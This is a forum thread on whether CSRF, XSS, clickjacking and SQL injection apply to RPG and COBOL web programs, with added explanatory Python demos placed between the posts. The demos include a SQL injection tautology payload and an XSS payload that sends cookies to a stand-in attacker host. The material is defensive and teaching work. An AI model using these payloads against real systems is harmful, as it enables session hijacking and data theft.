Is Cross Site Request Forgery (CSRF) & XSS applicable to RPG coding?

Posted on 2016-08-13
Last Modified: 2016-08-19

I refer to above url

a) is the above url's sample codes RPG codes?

b) are CSRF & XSS secure coding applicable to RPG coding?
Question by: sunhux

Author Comment

ID: 41754775
RPG is the coding used in AS400 or OS400
LVL 63

Assisted Solution

btan earned 125 total points
ID: 41754810
The site shows the RPG typing for the mentioned CGI program which takes in the csrftoken.
D CSRFToken       S            256                          
D CSRFTokenCookie...                                        
D                 S            256                          


CSRFToken = #getData('CSRFToken');          
CSRFTokenCookie = #getCookie('CSRFToken');
You can check out the IBM site on RPG programming codes; note the syntax!
/wiki/We13116a562db_467e_bcd4_882013aec57a/page/Coding%20in%20RPG%20IV%20-%20Chapter%202%20General%20info%20about%20RPG

Secure coding for web vulnerabilities as mentioned applies in concept; it is not only web based. For example, general SQL secure practices also apply to DB2 on the iSeries (injection protection and such), which includes embedded SQL in RPG programs.

See secure coding for business-oriented languages like COBOL and RPG, which are application driven and fronted mostly by web-based services. Application-based code tends to interface with the DB tier, hence the below shows gaps specific to SQL injection coding.

RPG language is used today in IBM platforms, on mainframe and mid-range systems (iSeries, AS/400 or whatever brand IBM currently uses). “Attack surface” is similar to COBOL, with security concerns in RPG code not well-known, as with COBOL.

Regarding technical flaws, RPG uses EXEC SQL for embedded code, which is safe unless dynamic SQL is used.
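The check the RPG snippet above is performing (compare the CSRFToken form field with the CSRFToken cookie) is the double-submit-cookie pattern. As an added example, not code from the thread or from any IBM i CGI library, here it is written out in Python so it can be run and the forged request can be seen failing. The names CSRFToken, #getData and #getCookie come from the snippet; the request shape (a Cookie header string plus a form-encoded body) is an assumption standing in for a CGI environment's HTTP_COOKIE and stdin, and the "transfer" handler is hypothetical.

```python
# Added example (not from the thread): double-submit-cookie CSRF check in Python.
# get_data / get_cookie mirror the #getData / #getCookie calls in the RPG snippet.
# The Cookie header + form body inputs are assumptions standing in for CGI's
# HTTP_COOKIE environment variable and POST body on stdin.
from __future__ import annotations

import hmac
import secrets
from http.cookies import SimpleCookie
from urllib.parse import parse_qs

COOKIE_NAME = "CSRFToken"   # cookie name used in the snippet
FIELD_NAME = "CSRFToken"    # form field name used in the snippet


def issue_token() -> str:
    """Server side: mint an unguessable token. The server sets it as the
    CSRFToken cookie AND embeds it as a hidden field in the form it renders."""
    return secrets.token_urlsafe(32)


def get_cookie(cookie_header: str, name: str) -> str:
    """Equivalent of #getCookie(): one cookie value out of the Cookie header."""
    jar = SimpleCookie()
    jar.load(cookie_header or "")
    return jar[name].value if name in jar else ""


def get_data(body: str, name: str) -> str:
    """Equivalent of #getData(): one field out of a form-encoded POST body."""
    return parse_qs(body or "", keep_blank_values=True).get(name, [""])[0]


def csrf_check(cookie_header: str, body: str) -> bool:
    """Accept only if the form token and the cookie token are both present and
    equal. compare_digest keeps the comparison constant-time so an attacker
    cannot learn how many leading characters of a guess were right."""
    form_token = get_data(body, FIELD_NAME)
    cookie_token = get_cookie(cookie_header, COOKIE_NAME)
    if not form_token or not cookie_token:
        return False
    return hmac.compare_digest(form_token, cookie_token)


def handle_transfer(cookie_header: str, body: str) -> tuple[int, str]:
    """Hypothetical CGI-style POST handler: 403 when the CSRF check fails,
    200 otherwise."""
    if not csrf_check(cookie_header, body):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {get_data(body, 'amount')}"


if __name__ == "__main__":
    token = issue_token()
    # The browser attaches the site's cookies to every request to the site,
    # including a POST triggered from an attacker's page.
    victim_cookie = f"CSRFToken={token}; SESSION=abc123"

    # Legitimate submission: the form our server rendered carries the token.
    print(handle_transfer(victim_cookie, f"amount=100&CSRFToken={token}"))
    # Forged cross-site POST: the cookie rides along, but the attacker's page
    # cannot read it, so the body carries no token, or a guessed one.
    print(handle_transfer(victim_cookie, "amount=100000"))
    print(handle_transfer(victim_cookie, "amount=100000&CSRFToken=guess"))
```

The pattern relies on the attacker not being able to set cookies for the site (for instance from a sibling subdomain); a synchronizer token stored in the server-side session and compared against the form field avoids that dependency. Whichever variant is used, the logic is a handful of string operations that an RPG CGI program can perform exactly as shown.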
LVL 62

Expert Comment

by:☠ MASQ ☠
ID: 41755053
RPG is the coding used in AS400 or OS400
That's a relief! I was trying to work out how CSRF could be used as an exploit in Role Playing Games!

LVL 35

Assisted Solution

by:Gary Patterson
Gary Patterson earned 250 total points
ID: 41756222
1a) Yes, CGI example shown is RPG.

1b) Yes. RPG applications can be vulnerable to CSRF & XSS if proper precautions are not taken, same as in any programming language.
LVL 33

Assisted Solution

shalomc earned 125 total points
ID: 41757928
CSRF and XSS vulnerabilities exist because of how http web servers and web clients interface and operate, regardless of the platform the server runs on. It could be php, or java, or node.js, or RPG.

Sometimes you as a programmer use a framework that attempts to mitigate those risks, but they are always there and must be dealt with. To deal with CSRF, XSS and other application-level attacks like content injection, you must first understand what they do and how they can be invoked. I strongly suggest looking at the OWASP Top 10.

You will notice that although some server side examples are presented in php or java, they are applicable in all programming languages and frameworks, even in RPG.

Especially in RPG, since IBM i developers who turned to web tend to be too arrogant in their false presumption that they have the best and most secure platform in the world.

Author Comment

ID: 41759852
Thanks Gary, Shalom.

I'm facing resistance from my colleagues in the apps teams doing COBOL & RPG coding, who categorically claim that XSS & CSRF & X-Frame-Options (=SAMEORIGIN, to deal with clickjacking) are irrelevant & inapplicable to RPG & COBOL.

If you could indicate short COBOL & RPG code that alludes to XSS & clickjacking vulnerabilities, or provide more links that explicitly indicate so, it would help to convince them.

One side question:
an external consultant for secure coding told me that open-source source code scanners (e.g. Yasca) usually detect only about 20% of poor/insecure code, while paid scanners (specifically, he says, Fortify & AppScan) usually detect about 3 times more for the same piece of code: any truth?
LVL 63

Assisted Solution

btan earned 125 total points
ID: 41760559
You should also include SQLi; this is also one of the top major web vulnerabilities (also in OWASP)
- sample for COBOL and RPG (as in my last post) -

To further this, AppScan (scan tool) also advocates the flaw checks in COBOL source code. Instead, you should ask for the code to be scanned using the scanner rather than getting any other code to reflect it for assurance.
How do you learn about COBOL scan rules in IBM Security AppScan Source for Security - and what are some of the potential vulnerabilities in COBOL source code?


 COBOL files (.cbl) can be directly imported into AppScan Source for security scanning.

 From a security perspective, COBOL applications have similar considerations to any other kind of application. AppScan Source can help you identify high risk locations within your COBOL application - and assist you in their remediation.
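The SQL injection case raised above, as an added example that is not code from the thread or from AppScan: a customer lookup done two ways, first with a statement string built by concatenation (what running EXECUTE IMMEDIATE or PREPARE on a host string assembled from user input amounts to), then with a parameter marker. Python's standard-library sqlite3 stands in for DB2 so the example runs offline; the customer table, its rows and the payload are constructed for the demo.

```python
# Added example (not from the thread): concatenated dynamic SQL vs. a parameter
# marker. sqlite3 stands in for DB2; table and rows are constructed sample data.
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """In-memory table with three invented customers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customer (custno TEXT, name TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO customer VALUES (?, ?, ?)",
        [("C001", "Alice", 120), ("C002", "Bob", 75), ("C003", "Carol", 9000)],
    )
    return conn


def lookup_dynamic(conn: sqlite3.Connection, custno: str) -> List[Tuple[str, str, int]]:
    """VULNERABLE: the statement text is assembled with the caller's input
    inside it, so the input is parsed as SQL, not treated as a value."""
    sql = "SELECT custno, name, balance FROM customer WHERE custno = '" + custno + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, custno: str) -> List[Tuple[str, str, int]]:
    """SAFE: the statement is fixed and the input is bound to a parameter
    marker (a host variable, in embedded-SQL terms). Quotes and keywords in
    the input stay data."""
    sql = "SELECT custno, name, balance FROM customer WHERE custno = ?"
    return conn.execute(sql, (custno,)).fetchall()


# Classic tautology payload: closes the literal and appends OR '1'='1'.
PAYLOAD = "x' OR '1'='1"


if __name__ == "__main__":
    conn = make_db()
    print(lookup_dynamic(conn, "C001"))          # one row, as intended
    print(lookup_dynamic(conn, PAYLOAD))         # all three rows: WHERE clause rewritten
    print(lookup_parameterized(conn, PAYLOAD))   # no rows: payload was just a string
    print(lookup_parameterized(conn, "C003"))    # still works for real keys
```

The same distinction holds for embedded SQL in RPG or COBOL: a static EXEC SQL statement with host variables is bound, whereas a statement string built in the program and handed to PREPARE or EXECUTE IMMEDIATE is only as safe as the code that assembled it.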
LVL 63

Assisted Solution

btan earned 125 total points
ID: 41760570
YASCA coverage depends more on the plugins it supports; some of the external plugins distributed with Yasca are listed below. But note that a plugin is file-extension specific when invoking a scan. For instance, a plugin that scans Java source code can be configured to only scan files with the .java extension.
 Grep Plugin. Uses external GREP files to scan target files for simple patterns.
 PMD Plugin. Uses PMD to parse and scan Java (and JSP) source code for issues.
 JLint Plugin. Uses J-Lint to scan Java .class files for issues.
 antiC Plugin. Uses antiC to scan Java and C/C++ source code for issues.
 FindBugs Plugin. Uses FIndBugs to scan Java class and Jar files for issues.
 Lint4J Plugin. Uses Lint4J to scan Java .class files for issues.

The grep plugin is useful for extending coverage as long as you can supply a valid PCRE-style regular expression for the flaw, including the OWASP ones. For more info, see this
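What a grep-style plugin can and cannot find, as an added example that is not Yasca's code or its rule-file format: three regular-expression rules applied line by line to a few constructed RPG and COBOL source lines. The rules flag dynamic-SQL constructs, but because the scan has no data-flow knowledge it also flags a statement built from a constant (line 6) and cannot tell whether a flagged host variable ever carried user input, which is the kind of gap a parsing, flow-aware scanner closes. The rule patterns and sample lines are assumptions written for this demo.

```python
# Added example (not Yasca's own code or rule format): a minimal grep-style
# source scan. Rules are plain regexes over single lines; the RPG and COBOL
# sample lines are constructed for the demo.
import re
from typing import Dict, List, Tuple

# rule name -> (pattern, message). Patterns are assumptions written for this demo.
RULES: Dict[str, Tuple[re.Pattern, str]] = {
    "dynamic-sql-execute-immediate": (
        re.compile(r"\bEXEC\s+SQL\s+EXECUTE\s+IMMEDIATE\b", re.I),
        "statement text built at run time; confirm it cannot contain user input",
    ),
    "dynamic-sql-prepare": (
        re.compile(r"\bEXEC\s+SQL\s+PREPARE\b.*\bFROM\b", re.I),
        "PREPARE from a host string; bind user values with parameter markers (?)",
    ),
    "sql-string-concat": (
        re.compile(r"""['"]\s*(SELECT|INSERT|UPDATE|DELETE)\b.*\+\s*\w+""", re.I),
        "SQL text concatenated with a variable",
    ),
}

# Constructed sample: free-form RPG lines followed by two COBOL lines.
SAMPLE_SOURCE = """\
       dcl-s stmt varchar(500);
       stmt = 'SELECT name FROM customer WHERE custno = ''' + custno + '''';
       exec sql prepare s1 from :stmt;
       exec sql execute immediate :stmt;
       exec sql select name into :name from customer where custno = :custno;
       stmt = 'SELECT name FROM customer WHERE region = ''' + constRegion + '''';
           MOVE 'UPDATE ACCT SET BAL = 0' TO WS-SQL
           EXEC SQL EXECUTE IMMEDIATE :WS-SQL END-EXEC
"""


def scan_source(source: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule name, stripped line) for every rule hit."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, (pattern, _msg) in RULES.items():
            if pattern.search(line):
                findings.append((lineno, rule, line.strip()))
    return findings


def flagged_lines(source: str) -> List[int]:
    """Just the line numbers, in order, for quick comparison."""
    return [lineno for lineno, _rule, _text in scan_source(source)]


if __name__ == "__main__":
    for lineno, rule, text in scan_source(SAMPLE_SOURCE):
        print(f"{lineno:>3}  {rule:<32} {RULES[rule][1]}")
        print(f"     {text}")
    # Line 5 (static embedded SQL with host variables) is correctly not flagged.
    # Line 6 is flagged although constRegion is a constant: a lexical rule
    # cannot see where the value came from, so it reports a false positive.
```

Extending a grep plugin with rules like these raises the number of dynamic-SQL sites it reports, but the triage of which ones actually take user input stays manual; that is the practical meaning of the coverage difference asked about above.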
LVL 33

Assisted Solution

shalomc earned 125 total points
ID: 41760910
Hi sunhux,

Obviously your colleagues are clueless about the nature of CSRF and XSS.
Please read the OWASP examples and show them that XSS and CSRF are platform agnostic, and are as applicable to COBOL web apps as to PHP code.

You can also tell them that the author of this book told you personally that using COBOL does not make a web application immune to these attacks.

COBOL and RPG, although poor choices for web development, are capable of dealing with web-based attacks ONLY IF you make them so, not by any inherent nature.

The only way for COBOL and RPG to be irrelevant is if all of the web interface is managed by an external platform, and COBOL/RPG are used as a data backend to that. But then SQL injection must still be ruled out.
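The reflected XSS and clickjacking cases the question asked for, as an added example that is not from the thread: a CGI-style handler in its vulnerable and hardened forms. It is written in Python rather than RPG or COBOL so it runs here, but the structure is exactly what a CGI program in any language does: read a query-string field, write HTTP headers, write an HTML body. The field name, the page template, the hypothetical host evil.example in the payload and the header set are constructed for the demo.

```python
# Added example (not from the thread): reflected XSS and clickjacking in a
# CGI-style handler, vulnerable form beside hardened form. Page template,
# parameter name and payload are constructed for the demo.
from html import escape
from typing import Dict, Tuple
from urllib.parse import parse_qs, urlencode

PAGE = "<html><body><h1>Hello, {name}</h1></body></html>"


def _param(query_string: str, name: str) -> str:
    """Read one query-string field, like a CGI program reading QUERY_STRING."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Echoes the parameter into the HTML unchanged: reflected XSS. No
    anti-framing header, so the page can be loaded in an attacker's iframe."""
    name = _param(query_string, "name")
    return "Content-Type: text/html\r\n\r\n" + PAGE.format(name=name)


def render_hardened(query_string: str) -> str:
    """Output-encodes the parameter for an HTML text context and emits the
    anti-framing headers: X-Frame-Options for older browsers and the CSP
    frame-ancestors directive that supersedes it."""
    name = _param(query_string, "name")
    headers = (
        "Content-Type: text/html; charset=utf-8\r\n"
        "X-Frame-Options: SAMEORIGIN\r\n"
        "Content-Security-Policy: frame-ancestors 'self'\r\n"
        "\r\n"
    )
    return headers + PAGE.format(name=escape(name, quote=True))


def split_response(raw: str) -> Tuple[Dict[str, str], str]:
    """Split a CGI response into (header dict, body) so it can be inspected."""
    head, _sep, body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n"):
        key, _sep, value = line.partition(":")
        headers[key.strip()] = value.strip()
    return headers, body


def contains_script_tag(body: str) -> bool:
    """Crude check used only to show whether the payload survived encoding."""
    return "<script" in body.lower()


# Constructed attack URL query: a script that ships the victim's cookies to
# a hypothetical attacker host.
PAYLOAD = urlencode(
    {"name": "<script>document.location='http://evil.example/?c='+document.cookie</script>"}
)


if __name__ == "__main__":
    for render in (render_vulnerable, render_hardened):
        headers, body = split_response(render(PAYLOAD))
        print(render.__name__)
        print("  script tag reaches browser:", contains_script_tag(body))
        print("  X-Frame-Options:", headers.get("X-Frame-Options", "(absent)"))
        print("  body:", body)
```

escape() is the right encoder only for HTML text and attribute values; a value placed inside a script block, a URL or a CSS rule needs the encoder for that context. The framing headers are independent of the body: a page with no XSS at all is still clickjackable until the server sends them, which is why X-Frame-Options applies to an RPG-generated page as much as to any other.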
LVL 35

Accepted Solution

Gary Patterson earned 250 total points
ID: 41761558
Who knows, maybe your colleagues are using a framework that includes good input validation, or have built and maintain good input validation routines that make their sites invulnerable to these attacks. I'd need to see your production code to comment.

Maybe all the UI layer is managed by another software layer, and all the RPG programs see are nice validated input.

Maybe they are living in AS/400 security dreamland: a place where nothing bad can ever happen to you because you run a magical operating system that even protects them against programmer errors and ignorance.

But there is nothing in RPG (I'm an IBM i / iSeries AS400 RPG programmer with almost 3 decades of experience) that provides automatic protection from these attacks.  It has nothing to do with the inherent security of the operating system - this is all about understanding web application security, and how to prevent common attacks through input validation.

For RPG, good luck with source vulnerability scanners. They need to understand the programming language, and most don't - not even IBM's AppScan Source product (which really is a great product - I've used it in the past):

There are two approaches to web application security (we prefer using both for web-facing mission critical applications):

Application scanning applications - which typically simulate an attack to determine if a vulnerability exists.

Source scanning applications - which search application source code for high-risk code patterns (or missing validation code patterns).

For applications that depend on less-widely used web programming languages like RPG, I suggest you look at application scanning tools, as opposed to source scanning tools.
